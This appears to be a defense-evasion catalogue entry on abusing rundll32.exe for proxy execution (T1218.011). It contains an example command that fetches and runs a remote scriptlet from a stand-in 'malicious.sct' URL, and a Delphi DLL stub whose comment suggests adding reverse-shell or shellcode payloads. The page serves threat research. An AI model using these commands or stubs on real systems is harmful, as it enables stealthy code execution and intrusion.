System Binary Proxy Execution: Rundll32

Created the Sunday 05 March 2023. Updated 2 months, 3 weeks ago.

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).

Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.

Technique Identifier

T1218.011

Technique Tags

Defense Evasion rundll32.exe {DLLname DLLfunction} execute Control Panel Item files (.cpl) Control_RunDLL Control_RunDLLAsUser rundll32.exe javascript: obfuscate malicious code Masquerading APT19 APT28 APT29 APT3 APT32 APT38 APT41 maintain persistence inject malicious payload execute malicious DLLs

Code Snippets

Description

The exported function must follow a specific signature to be invoked by rundll32.exe.

You can then call the exported function using the following command:

rundll32.exe <dll>,<exported_function> <args>

rundll32.exe rundll.dll,UnprotectFunction Hello, World

library rundll32;

uses
  System.SysUtils,
  Winapi.Windows;

const LOG_TEMPLATE = 'Unprotect -> %s';

{ Simplify ODS Call }
procedure Debug(const AMessage : PWideChar); stdcall;
begin
  OutputDebugStringW(PWideChar(Format(LOG_TEMPLATE, [WideCharToString(AMessage)])));
end;

{ One method to retrieve process name from PID }
function GetProcessName(const AProcessID : Cardinal) : String;
var QueryFullProcessImageNameW : function(
                                    AProcess: THANDLE;
                                    AFlags: DWORD;
                                    AFileName: PWideChar;
                                    var ASize: DWORD
    ): BOOL; stdcall;

const PROCESS_QUERY_LIMITED_INFORMATION = $00001000;
begin
  result := '';
  ///

  if (TOSVersion.Major < 6) then
    Exit();
  ///

  QueryFullProcessImageNameW := nil;

  var hDLL := LoadLibrary('kernel32.dll');
  if hDLL = 0 then
    Exit();
  try
    @QueryFullProcessImageNameW := GetProcAddress(hDLL, 'QueryFullProcessImageNameW');
    ///

    if Assigned(QueryFullProcessImageNameW) then begin
      var hProc := OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, AProcessID);
      if hProc = 0 then exit;
      try
        var ALength : DWORD := (MAX_PATH * 2);

        SetLength(result, ALength);

        if NOT QueryFullProcessImageNameW(hProc, 0, @result[1], ALength) then
          Exit();

        SetLength(result, ALength);
      finally
        CloseHandle(hProc);
      end;
    end;
  finally
    FreeLibrary(hDLL);
  end;
end;

{ Exported Function : Require this function signature be operated by Rundll32 }
procedure UnprotectFunction(hHwnd, hInstance : THandle; lpszCmdLine : PAnsiChar; nCmdShow : Integer); stdcall;
begin
  var AProcessId := GetCurrentProcessId();

  var AMessage := Format('%s' + #13#10#13#10 + 'From: %s (%d / 0x%x)',
    [
      lpszCmdLine,
      ExtractFileName(GetProcessName(AProcessId)),
      AProcessId,
      AProcessId
    ]
  );

  MessageBoxA(0, PAnsiChar(AnsiString(AMessage)), 'Unprotect Test', MB_ICONINFORMATION);

  // Define and parse `lpszCmdLine` to extend functionality of your payload
  // (Ex: rev shell IP, Port, App; Encoded shellcode etc..)
end;

{ DLL Initialization / Finalization }
procedure DllMain(const AReason : DWORD);
begin
  case AReason of
    DLL_PROCESS_ATTACH:
      Debug('DLL_PROCESS_ATTACH');

    // ...
  end;
end;

{ Define Exportations }
exports
  UnprotectFunction index 14 name 'UnprotectFunction';

{ EP }
begin
  DllProc := @DllMain;

  DllMain(DLL_PROCESS_ATTACH);

end.

About Author Open Snippet

Author: Jean-Pierre LESUEUR (DarkCoderSc) / Target Platform: Windows

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.

System Binary Proxy Execution: Rundll32, Sub-technique T1218.011 - Enterprise | MITRE ATT&CK®